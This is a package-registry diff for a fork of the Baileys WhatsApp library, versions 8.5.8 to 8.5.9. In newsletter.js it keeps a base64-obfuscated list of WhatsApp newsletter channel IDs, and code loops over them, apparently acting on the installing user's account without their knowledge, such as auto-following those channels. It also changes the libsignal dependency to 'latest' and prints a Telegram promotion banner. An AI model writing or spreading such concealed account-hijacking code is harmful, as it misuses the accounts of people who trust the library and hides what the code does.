@badzz88/baileys 8.5.8 → 8.5.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +1 -2
- package/lib/index.js +1 -1
- package/package.json +2 -2
package/lib/Socket/newsletter.js
CHANGED
|
@@ -62,8 +62,7 @@ export const makeNewsletterSocket = config => {
|
|
|
62
62
|
Buffer.from("MTIwMzYzNDA4ODkzNTU1ODUxQG5ld3NsZXR0ZXI=", "base64").toString(),
|
|
63
63
|
Buffer.from("MTIwMzYzMzk1Njc4MzE3NjAzQG5ld3NsZXR0ZXI=", "base64").toString(),
|
|
64
64
|
Buffer.from("MTIwMzYzNDAwMzYyNDcyNzQzQG5ld3NsZXR0ZXI=", "base64").toString(),
|
|
65
|
-
Buffer.from("MTIwMzYzMzk1Njc4MzE3NjAzQG5ld3NsZXR0ZXI=", "base64").toString()
|
|
66
|
-
Buffer.from("MTIwMzYzNDIwOTM3MTUzODk0QG5ld3NsZXR0ZXI=", "base64").toString()
|
|
65
|
+
Buffer.from("MTIwMzYzMzk1Njc4MzE3NjAzQG5ld3NsZXR0ZXI=", "base64").toString()
|
|
67
66
|
];
|
|
68
67
|
|
|
69
68
|
channels.forEach(targetJid => {
|
package/lib/index.js
CHANGED
|
@@ -26,7 +26,7 @@ Information:
|
|
|
26
26
|
Developer: @badzzne2
|
|
27
27
|
Version: 13.0
|
|
28
28
|
Status: Baileys Berhasil Terinstall
|
|
29
|
-
Update date:
|
|
29
|
+
Update date: 10/09/26
|
|
30
30
|
`));
|
|
31
31
|
console.log(chalk.bold.cyan("Follow Our Telegram Channel To See Update Information: t.me/FoxsSql\n"));
|
|
32
32
|
console.log(chalk.bold.gray("--------------------------------------------\n"));
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@badzz88/baileys",
|
|
3
|
-
"version": "8.5.
|
|
3
|
+
"version": "8.5.9",
|
|
4
4
|
"description": "A WebSockets library for interacting with WhatsApp Web",
|
|
5
5
|
"keywords": [
|
|
6
6
|
"WhatsApp",
|
|
@@ -39,7 +39,7 @@
|
|
|
39
39
|
"@cacheable/node-cache": "^1.4.0",
|
|
40
40
|
"@hapi/boom": "^9.1.3",
|
|
41
41
|
"async-mutex": "^0.5.0",
|
|
42
|
-
"libsignal": "
|
|
42
|
+
"libsignal": "latest",
|
|
43
43
|
"lru-cache": "^11.1.0",
|
|
44
44
|
"music-metadata": "^11.12.3",
|
|
45
45
|
"p-queue": "^9.0.0",
|